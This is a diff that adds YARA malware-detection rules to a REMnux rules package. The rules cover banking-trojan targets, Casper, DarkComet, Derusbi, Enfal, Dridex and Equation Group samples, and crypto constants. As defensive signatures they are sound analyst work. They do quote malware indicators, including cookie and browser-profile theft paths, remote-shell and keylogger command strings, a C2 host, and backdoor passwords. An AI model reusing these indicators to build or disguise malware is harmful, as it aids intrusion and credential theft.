+    $bank0313 = ".gruppocarige.it" nocase
+    $bank0314 = "isideonline.it" nocase
+    $bank0315 = "hb.quiubi.it" nocase
+    $bank0316 = "mijn.postbank.nl" nocase
+    $bank0319 = "kiwibank.co.nz" nocase
+    $bank031a = "secure.inteligo.com.pl" nocase
+    $bank031b = "inwestoronline.pl" nocase
+    $bank031c = "ipko.pl" nocase
+    $bank031f = "citibank.ru" nocase
+    $bank0320 = "cardsonline-consumer.com" nocase
+    $bank0321 = "home.cbonline.co.uk" nocase
+    $bank0322 = ".co-operativebank.co.uk" nocase
+    $bank0324 = ".banking.first-direct.com/" nocase
+    $bank0325 = "halifax-online.co.uk" nocase
+    $bank0326 = ".ebank.hsbc.co.uk" nocase
+    $bank0329 = "moneybookers.com" nocase
+    $bank032a = ".nationet.com" nocase
+    $bank032f = "home.ybonline.co.uk" nocase
+    $bank0330 = "altergold.com" nocase
+    $bank0331 = "chaseonline.chase.com" nocase
+    $bank0332 = "c-gold.com" nocase
+    $bank0333 = "resources.chase.com" nocase
+    $bank0336 = ".us.hsbc.com" nocase
+
+	condition:
+	any of them
+}
+
+rule browsers
+{
+    meta:
+    description = "Indicates attempt to modify browser behavior"
+    
+    strings:
+    $browser0 = "browser" nocase
+    $browser1 = "avant" nocase
+    $browser2 = "netscape" nocase fullword
+    $browser3 = "flock" nocase
+    $browser4 = "safari" nocase 
+    $browser5 = "chrome" nocase
+    $browser6 = "opera" nocase fullword
+    $browser7 = "mozilla" nocase
+    $browser8 = "firefox" nocase
+    $browser9 = "GreenBrowser" fullword
+    
+    $adobe1 = "Adobe Systems Incorporated" 
+    $adobe2 = "Adobe Systems Incorporated" wide
+    
+    condition:
+    (4 of ($browser*)) and not $adobe1 and not $adobe2
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara.old/Casper.yara remnux-rules-0.0.4/yara.old/Casper.yara
--- remnux-rules-0.0.3/yara.old/Casper.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Casper.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,101 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Casper_Backdoor_x86 {
+	meta:
+		description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/05"
+		hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
+		score = 80
+	strings:
+		$s1 = "\"svchost.exe\"" fullword wide
+		$s2 = "firefox.exe" fullword ascii
+		$s3 = "\"Host Process for Windows Services\"" fullword wide
+		
+		$x1 = "\\Users\\*" fullword ascii
+		$x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
+		$x3 = "\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
+		$x4 = "\\Documents and Settings\\*" fullword ascii
+		
+		$y1 = "%s; %S=%S" fullword wide
+		$y2 = "%s; %s=%s" fullword ascii
+		$y3 = "Cookie: %s=%s" fullword ascii
+		$y4 = "http://%S:%d" fullword wide
+		
+		$z1 = "http://google.com/" fullword ascii
+		$z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii
+		$z3 = "Operating System\"" fullword wide
+	condition:
+		( all of ($s*) ) or
+		( 3 of ($x*) and 2 of ($y*) and 2 of ($z*) )
+}
+
+rule Casper_EXE_Dropper {
+	meta:
+		description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/05"
+		hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
+		score = 80
+	strings:
+		$s0 = "<Command>" fullword ascii
+		$s1 = "</Command>" fullword ascii
+		$s2 = "\" /d \"" fullword ascii
+		$s4 = "'%s' %s" fullword ascii
+		$s5 = "nKERNEL32.DLL" fullword wide
+		$s6 = "@ReturnValue" fullword wide
+		$s7 = "ID: 0x%x" fullword ascii
+		$s8 = "Name: %S" fullword ascii
+	condition:
+		7 of them
+}
+
+rule Casper_Included_Strings {
+	meta:
+		description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/06"
+		score = 50
+	strings:
+		$a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
+		$a1 = "& SYSTEMINFO) ELSE EXIT"
+		
+		$mz = { 4d 5a }
+		$c1 = "domcommon.exe" wide fullword							// File Name
+		$c2 = "jpic.gov.sy" fullword 								// C2 Server
+		$c3 = "aiomgr.exe" wide fullword							// File Name
+		$c4 = "perfaudio.dat" fullword								// Temp File Name
+		$c5 = "Casper_DLL.dll" fullword								// Name 
+		$c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 } 	// Decryption Key
+		$c7 = "{4216567A-4512-9825-7745F856}" fullword 				// Mutex
+	condition:
+		all of ($a*) or
+		( $mz at 0 ) and ( 1 of ($c*) )
+}
+
+rule Casper_SystemInformation_Output {
+	meta:
+		description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/06"
+		score = 70	
+	strings:
+		$a0 = "***** SYSTEM INFORMATION ******"
+		$a1 = "***** SECURITY INFORMATION ******"
+		$a2 = "Antivirus: "
+		$a3 = "Firewall: "
+		$a4 = "***** EXECUTION CONTEXT ******"
+		$a5 = "Identity: "
+		$a6 = "<CONFIG TIMESTAMP="
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/Cerberus.yara remnux-rules-0.0.4/yara.old/Cerberus.yara
--- remnux-rules-0.0.3/yara.old/Cerberus.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Cerberus.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Cerberus : rat
+{
+	meta:
+		description = "Cerberus"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-01-12"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$checkin = "Ypmw1Syv023QZD"
+		$clientpong = "wZ2pla"
+		$serverping = "wBmpf3Pb7RJe"
+		$generic = "cerberus" nocase
+
+	condition:
+		any of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/Cookies.yara remnux-rules-0.0.4/yara.old/Cookies.yara
--- remnux-rules-0.0.3/yara.old/Cookies.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Cookies.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,46 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule CookiesStrings : Cookies Family
+{
+    meta:
+        description = "Cookies Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    strings:
+        $zip1 = "ntdll.exePK"
+        $zip2 = "AcroRd32.exePK"
+        $zip3 = "Setup=ntdll.exe\x0d\x0aSilent=1\x0d\x0a"
+        $zip4 = "Setup=%temp%\\AcroRd32.exe\x0d\x0a"
+        $exe1 = "Leave GetCommand!"
+        $exe2 = "perform exe success!"
+        $exe3 = "perform exe failure!"
+        $exe4 = "Entry SendCommandReq!"
+        $exe5 = "Reqfile not exist!"
+        $exe6 = "LeaveDealUpfile!"
+        $exe7 = "Entry PostData!"
+        $exe8 = "Leave PostFile!"
+        $exe9 = "Entry PostFile!"
+        $exe10 = "\\unknow.zip" wide ascii
+        $exe11 = "the url no respon!"
+        
+    condition:
+      (2 of ($zip*)) or (2 of ($exe*))
+}
+
+rule Cookies : Family
+{
+    meta:
+        description = "Cookies"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    condition:
+        CookiesStrings
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/crypto.yara remnux-rules-0.0.4/yara.old/crypto.yara
--- remnux-rules-0.0.3/yara.old/crypto.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/crypto.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,146 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule BLOWFISH_Constants {
+        meta:
+                author = "phoul (@phoul)"
+                description = "Look for Blowfish constants"
+                date = "2014-01"
+                version = "0.1"
+        strings:
+		$c0 = { D1310BA6 }
+		$c1 = { A60B31D1 }	
+		$c2 = { 98DFB5AC }
+		$c3 = { ACB5DF98 }
+		$c4 = { 2FFD72DB }
+		$c5 = { DB72FD2F }
+		$c6 = { D01ADFB7 }
+		$c7 = { B7DF1AD0 }
+		$c8 = { 4B7A70E9 }
+		$c9 = { E9707A4B }
+		$c10 = { F64C261C }
+		$c11 = { 1C264CF6 }
+	condition:
+                6 of them
+}
+
+rule MD5_Constants {
+        meta:
+                author = "phoul (@phoul)"
+                description = "Look for MD5 constants"
+                date = "2014-01"
+                version = "0.2"
+        strings:
+		// Init constants
+		$c0 = { 67452301 }
+		$c1 = { efcdab89 }
+		$c2 = { 98badcfe }
+		$c3 = { 10325476 }
+		$c4 = { 01234567 }
+		$c5 = { 89ABCDEF }
+		$c6 = { FEDCBA98 }
+		$c7 = { 76543210 }	
+		// Round 2
+		$c8 = { F4D50d87 }
+		$c9 = { 78A46AD7 }
+	condition:
+                5 of them
+}
+
+rule RC6_Constants {
+        meta:
+                author = "chort (@chort0)"
+                description = "Look for RC6 magic constants in binary"
+                reference = "https://twitter.com/mikko/status/417620511397400576"
+                reference2 = "https://twitter.com/dyngnosis/status/418105168517804033"
+                date = "2013-12"
+                version = "0.2"
+        strings:
+                $c1 = { B7E15163 }
+                $c2 = { 9E3779B9 }
+                $c3 = { 6351E1B7 }
+                $c4 = { B979379E }
+        condition:
+                2 of them
+}
+
+rule RIPEMD160_Constants {
+        meta:
+                author = "phoul (@phoul)"
+                description = "Look for RIPEMD-160 constants"
+                date = "2014-01"
+                version = "0.1"
+        strings:
+		$c0 = { 67452301 }
+		$c1 = { EFCDAB89 }
+		$c2 = { 98BADCFE }
+		$c3 = { 10325476 }
+		$c4 = { C3D2E1F0 }
+		$c5 = { 01234567 }
+		$c6 = { 89ABCDEF }
+		$c7 = { FEDCBA98 }
+		$c8 = { 76543210 }
+		$c9 = { F0E1D2C3 }
+	condition:
+		5 of them
+}
+rule SHA1_Constants {
+        meta:
+                author = "phoul (@phoul)"
+                description = "Look for SHA1 constants"
+                date = "2014-01"
+                version = "0.1"
+        strings:
+		$c0 = { 67452301 }
+		$c1 = { EFCDAB89 }
+		$c2 = { 98BADCFE }
+		$c3 = { 10325476 }
+		$c4 = { C3D2E1F0 }
+		$c5 = { 01234567 }
+		$c6 = { 89ABCDEF }
+		$c7 = { FEDCBA98 }
+		$c8 = { 76543210 }
+		$c9 = { F0E1D2C3 }
+	condition:
+                5 of them
+}
+
+rule SHA512_Constants {
+        meta:
+                author = "phoul (@phoul)"
+                description = "Look for SHA384/SHA512 constants"
+                date = "2014-01"
+                version = "0.1"
+        strings:
+		$c0 = { 428a2f98 }
+		$c1 = { 982F8A42 }
+		$c2 = { 71374491 }
+		$c3 = { 91443771 }
+		$c4 = { B5C0FBCF }
+		$c5 = { CFFBC0B5 }
+		$c6 = { E9B5DBA5 }
+		$c7 = { A5DBB5E9 }
+		$c8 = { D728AE22 }
+		$c9 = { 22AE28D7 }
+	condition:
+		5 of them
+}
+
+rule WHIRLPOOL_Constants {
+        meta:
+                author = "phoul (@phoul)"
+                description = "Look for WhirlPool constants"
+                date = "2014-02"
+                version = "0.1"
+        strings:
+		$c0 = { 18186018c07830d8 }
+		$c1 = { d83078c018601818 }
+		$c2 = { 23238c2305af4626 }
+		$c3 = { 2646af05238c2323 }
+	condition:
+                2 of them
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/cxpid.yara remnux-rules-0.0.4/yara.old/cxpid.yara
--- remnux-rules-0.0.3/yara.old/cxpid.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/cxpid.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,49 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule cxpidStrings : cxpid Family
+{
+    meta:
+        description = "cxpid Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    strings:
+        $ = "/cxpid/submit.php?SessionID="
+        $ = "/cxgid/"
+        $ = "E21BC52BEA2FEF26D005CF"
+        $ = "E21BC52BEA39E435C40CD8"
+        $ = "                   -,L-,O+,Q-,R-,Y-,S-"
+        
+    condition:
+       any of them
+}
+
+rule cxpidCode : cxpid Family 
+{
+    meta:
+        description = "cxpid code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+    
+    strings:
+        $entryjunk = { 55 8B EC B9 38 04 00 00 6A 00 6A 00 49 75 F9 }
+    
+    condition:
+        any of them
+}
+
+rule cxpid : Family
+{
+    meta:
+        description = "cxpid"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    condition:
+        cxpidCode or cxpidStrings
+}
diff -Nru remnux-rules-0.0.3/yara.old/DarkComet.yara remnux-rules-0.0.4/yara.old/DarkComet.yara
--- remnux-rules-0.0.3/yara.old/DarkComet.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/DarkComet.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,61 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule DarkComet_2
+{
+    meta:
+        description = "DarkComet RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $bot1 = /(#)BOT#OpenUrl/ wide ascii
+        $bot2 = /(#)BOT#Ping/ wide ascii
+        $bot3 = /(#)BOT#RunPrompt/ wide ascii
+        $bot4 = /(#)BOT#SvrUninstall/ wide ascii
+        $bot5 = /(#)BOT#URLDownload/ wide ascii
+        $bot6 = /(#)BOT#URLUpdate/ wide ascii
+        $bot7 = /(#)BOT#VisitUrl/ wide ascii
+        $bot8 = /(#)BOT#CloseServer/ wide ascii
+
+        $ddos1 = /(D)DOSHTTPFLOOD/ wide ascii
+        $ddos2 = /(D)DOSSYNFLOOD/ wide ascii
+        $ddos3 = /(D)DOSUDPFLOOD/ wide ascii
+
+        $keylogger1 = /(A)ctiveOnlineKeylogger/ wide ascii
+        $keylogger2 = /(U)nActiveOnlineKeylogger/ wide ascii
+        $keylogger3 = /(A)ctiveOfflineKeylogger/ wide ascii
+        $keylogger4 = /(U)nActiveOfflineKeylogger/ wide ascii
+
+        $shell1 = /(A)CTIVEREMOTESHELL/ wide ascii
+        $shell2 = /(S)UBMREMOTESHELL/ wide ascii
+        $shell3 = /(K)ILLREMOTESHELL/ wide ascii
+
+    condition:
+        4 of ($bot*) or all of ($ddos*) or all of ($keylogger*) or all of ($shell*)
+}
+
+rule DarkComet : rat
+{
+	meta:
+		description = "DarkComet" 
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-01-12"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$a = "#BEGIN DARKCOMET DATA --"
+		$b = "#EOF DARKCOMET DATA --"
+		$c = "DC_MUTEX-"
+		$k1 = "#KCMDDC5#-890"
+		$k2 = "#KCMDDC51#-890"
+
+	condition:
+		any of them
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/Derusbi.yara remnux-rules-0.0.4/yara.old/Derusbi.yara
--- remnux-rules-0.0.3/yara.old/Derusbi.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Derusbi.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,61 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Trojan_Derusbi {
+    meta:
+        Author = "RSA_IR"
+        Date     = "4Sept13"
+        File     = "derusbi_variants v 1.3"
+        MD5      = " c0d4c5b669cc5b51862db37e972d31ec "
+
+    strings:
+        $b1 = {8b 15 ?? ?? ?? ?? 8b ce d3 ea 83 c6 ?? 30 90 ?? ?? ?? ?? 40 3b 05 ?? ?? ?? ?? 72 ??}
+        $b2 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E F7 5D 88 2E 0C A2 88 2E 4B 5D 88 2E F3 5D 88 2E}
+        $b3 = {4E E6 40 BB}
+        $b4 = {B1 19 BF 44}
+        $b5 = {6A F5 44 3D ?? ?? 00 00 27 AF D4 3D 69 F5 44 3D 6E F5 44 3D 95 0A 44 3D D2 F5 44 3D 6A F5 44 3D}
+        $b6 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E}
+        $b7 = {D6 D5 A4 A3 ?? ?? 00 00 9B 8F 34 A3 D5 D5 A4 A3 D2 D5 A4 A3 29 2A A4 A3}
+        $b8 = {C3 76 33 9F ?? ?? 00 00 8E 2C A3 9F C0 76 33 9F C7 76 33 9F 3C 89 33 9F}
+
+    condition:
+        2 of ($b1, $b2, $b3, $b4) and 1 of ($b5, $b6, $b7, $b8)
+}
+
+rule APT_Derusbi_DeepPanda
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+	reference = "http://www.crowdstrike.com/sites/default/files/AdversaryIntelligenceReport_DeepPanda_0.pdf"
+strings:
+	$D = "Dom4!nUserP4ss" wide ascii
+condition:
+	$D
+}
+
+
+rule APT_Derusbi_Gen
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+strings:
+	$2 = "273ce6-b29f-90d618c0" wide ascii
+	$A = "Ace123dx" fullword wide ascii
+	$A1 = "Ace123dxl!" fullword wide ascii
+	$A2 = "Ace123dx!@#x" fullword wide ascii
+	$C = "/Catelog/login1.asp" wide ascii
+	$DF = "~DFTMP$$$$$.1" wide ascii
+	$G = "GET /Query.asp?loginid=" wide ascii
+	$L = "LoadConfigFromReg failded" wide ascii
+	$L1 = "LoadConfigFromBuildin success" wide ascii
+	$ph = "/photoe/photo.asp HTTP" wide ascii
+	$PO = "POST /photos/photo.asp" wide ascii
+	$PC = "PCC_IDENT" wide ascii
+condition:
+	any of them
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/Dexter.yara remnux-rules-0.0.4/yara.old/Dexter.yara
--- remnux-rules-0.0.3/yara.old/Dexter.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Dexter.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,22 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Dexter_Malware {
+	meta:
+		description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b"
+		author = "Florian Roth"
+		reference = "http://goo.gl/oBvy8b"
+		date = "2015/02/10"
+		score = 70
+	strings:
+		$s0 = "Java Security Plugin" fullword wide
+		$s1 = "%s\\%s\\%s.exe" fullword wide
+		$s2 = "Sun Java Security Plugin" fullword wide
+		$s3 = "\\Internet Explorer\\iexplore.exe" fullword wide
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/Dridex.yara remnux-rules-0.0.4/yara.old/Dridex.yara
--- remnux-rules-0.0.3/yara.old/Dridex.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Dridex.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,29 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Dridex_Trojan_XML {
+	meta:
+		description = "Dridex Malware in XML Document"
+		author = "Florian Roth @4nc4p"
+		reference = "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503"
+		date = "2015/03/08"
+		hash1 = "88d98e18ed996986d26ce4149ae9b2faee0bc082"
+		hash2 = "3b2d59adadf5ff10829bb5c27961b22611676395"
+		hash3 = "e528671b1b32b3fa2134a088bfab1ba46b468514"
+		hash4 = "981369cd53c022b434ee6d380aa9884459b63350"
+		hash5 = "96e1e7383457293a9b8f2c75270b58da0e630bea"
+	strings:
+		// can be ascii or wide formatted - therefore no restriction
+		$c_xml      = "<?xml version="
+		$c_word     = "<?mso-application progid=\"Word.Document\"?>"
+		$c_macro    = "w:macrosPresent=\"yes\""
+		$c_binary   = "<w:binData w:name="
+		$c_0_chars  = "<o:Characters>0</o:Characters>"
+		$c_1_line   = "<o:Lines>1</o:Lines>"
+	condition:
+		all of ($c*)
+}
diff -Nru remnux-rules-0.0.3/yara.old/Enfal.yara remnux-rules-0.0.4/yara.old/Enfal.yara
--- remnux-rules-0.0.3/yara.old/Enfal.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Enfal.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,132 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule EnfalCode : Enfal Family 
+{
+    meta:
+        description = "Enfal code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        // mov al, 20h; sub al, bl; add [ebx+esi], al; push esi; inc ebx; call edi; cmp ebx, eax
+        $decrypt = { B0 20 2A C3 00 04 33 56 43 FF D7 3B D8 }
+        
+    condition:
+        any of them
+}
+
+rule EnfalStrings : Enfal Family
+{
+    meta:
+        description = "Enfal Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $ = "D:\\work\\\xe6\xba\x90\xe5\x93\xa5\xe5\x85\x8d\xe6\x9d\x80\\tmp\\Release\\ServiceDll.pdb"
+        $ = "e:\\programs\\LuridDownLoader"
+        $ = "LuridDownloader for Falcon"
+        $ = "DllServiceTrojan"
+        $ = "\\k\\\xe6\xa1\x8c\xe8\x9d\xa2\\"
+        $ = "EtenFalcon\xef\xbc\x88\xe4\xbf\xae\xe6\x94\xb9\xef\xbc\x89"
+        $ = "Madonna\x00Jesus"
+        $ = "/iupw82/netstate"
+        $ = "fuckNodAgain"
+        $ = "iloudermao"
+        $ = "Crpq2.cgi"
+        $ = "Clnpp5.cgi"
+        $ = "Dqpq3ll.cgi"
+        $ = "dieosn83.cgi"
+        $ = "Rwpq1.cgi"
+        $ = "/Ccmwhite"
+        $ = "/Cmwhite"
+        $ = "/Crpwhite"
+        $ = "/Dfwhite"
+        $ = "/Query.txt"
+        $ = "/Ufwhite"
+        $ = "/cgl-bin/Clnpp5.cgi"
+        $ = "/cgl-bin/Crpq2.cgi"
+        $ = "/cgl-bin/Dwpq3ll.cgi"
+        $ = "/cgl-bin/Owpq4.cgi"
+        $ = "/cgl-bin/Rwpq1.cgi"
+        $ = "/trandocs/mm/"
+        $ = "/trandocs/netstat"
+        $ = "NFal.exe"
+        $ = "LINLINVMAN"
+        $ = "7NFP4R9W"
+        
+    condition:
+        any of them
+}
+
+rule Enfal : Family
+{
+    meta:
+        description = "Enfal"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    condition:
+        EnfalCode or EnfalStrings
+}
+
+
+rule Enfal_Malware {
+	meta:
+		description = "Detects a certain type of Enfal Malware"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/02/10"
+		hash = "9639ec9aca4011b2724d8e7ddd13db19913e3e16"
+		score = 60
+	strings:
+		$s0 = "POWERPNT.exe" fullword ascii
+		$s1 = "%APPDATA%\\Microsoft\\Windows\\" fullword ascii
+		$s2 = "%HOMEPATH%" fullword ascii
+		$s3 = "Server2008" fullword ascii
+		$s4 = "Server2003" fullword ascii
+		$s5 = "Server2003R2" fullword ascii
+		$s6 = "Server2008R2" fullword ascii
+		$s9 = "%HOMEDRIVE%" fullword ascii
+		$s13 = "%ComSpec%" fullword ascii
+	condition:
+		all of them
+}
+
+rule Enfal_Malware_Backdoor {
+	meta:
+		description = "Generic Rule to detect the Enfal Malware"
+		author = "Florian Roth"
+		date = "2015/02/10"
+		super_rule = 1
+		hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
+		hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
+		hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
+		score = 60
+	strings:
+		$mz = { 4d 5a }
+			
+		$x1 = "Micorsoft Corportation" fullword wide
+		$x2 = "IM Monnitor Service" fullword wide
+		
+		$s1 = "imemonsvc.dll" fullword wide
+		$s2 = "iphlpsvc.tmp" fullword
+		
+		$z1 = "urlmon" fullword
+		$z2 = "Registered trademarks and service marks are the property of their respec" wide		
+		$z3 = "XpsUnregisterServer" fullword
+		$z4 = "XpsRegisterServer" fullword
+		$z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
+	condition:
+		( $mz at 0 ) and 
+		( 
+			1 of ($x*) or 
+			( all of ($s*) and all of ($z*) )
+		)
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/Equation.yara remnux-rules-0.0.4/yara.old/Equation.yara
--- remnux-rules-0.0.3/yara.old/Equation.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Equation.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,573 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+
+
+/* Equation APT ------------------------------------------------------------ */
+
+rule apt_equation_exploitlib_mutexes {
+    meta:
+        copyright = "Kaspersky Lab"
+        description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW"
+        version = "1.0"
+        last_modified = "2015-02-16"
+        reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+    strings:
+        $mz="MZ"
+        $a1="prkMtx" wide
+        $a2="cnFormSyncExFBC" wide
+        $a3="cnFormVoidFBC" wide
+        $a4="cnFormSyncExFBC"
+        $a5="cnFormVoidFBC"
+    condition:
+        (($mz at 0) and any of ($a*))
+}
+
+rule apt_equation_doublefantasy_genericresource {
+    meta:
+        copyright = "Kaspersky Lab"
+        description = "Rule to detect DoubleFantasy encoded config http://goo.gl/ivt8EW"
+        version = "1.0"
+        last_modified = "2015-02-16"
+        reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+    strings:
+        $mz="MZ"
+        $a1={06 00 42 00 49 00 4E 00 52 00 45 00 53 00}
+        $a2="yyyyyyyyyyyyyyyy"
+        $a3="002"
+    condition:
+        (($mz at 0) and all of ($a*)) and filesize < 500000
+}
+
+rule apt_equation_equationlaser_runtimeclasses {
+	meta:
+	    copyright = "Kaspersky Lab"
+	    description = "Rule to detect the EquationLaser malware"
+	    version = "1.0"
+	    last_modified = "2015-02-16"
+	    reference = "https://securelist.com/blog/"
+	strings:
+	    $a1="?a73957838_2@@YAXXZ"
+	    $a2="?a84884@@YAXXZ"
+	    $a3="?b823838_9839@@YAXXZ"
+	    $a4="?e747383_94@@YAXXZ"
+	    $a5="?e83834@@YAXXZ"
+	    $a6="?e929348_827@@YAXXZ"
+	condition:
+	    any of them
+}
+
+rule apt_equation_cryptotable {
+	meta:
+	    copyright = "Kaspersky Lab"
+	    description = "Rule to detect the crypto library used in Equation group malware"
+	    version = "1.0"
+	    last_modified = "2015-02-16"
+	    reference = "https://securelist.com/blog/"
+	strings:
+	    $a={37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1}
+	condition:
+	    $a
+}
+
+/* Equation Group - Kaspersky ---------------------------------------------- */
+
+rule Equation_Kaspersky_TripleFantasy_1 {
+	meta:
+		description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW"
+		author = "Florian Roth"
+		reference = "http://goo.gl/ivt8EW"
+		date = "2015/02/16"
+		hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9"
+	strings:
+		$mz = { 4d 5a }
+
+		$s0 = "%SystemRoot%\\system32\\hnetcfg.dll" fullword wide
+		$s1 = "%WINDIR%\\System32\\ahlhcib.dll" fullword wide
+		$s2 = "%WINDIR%\\sjyntmv.dat" fullword wide
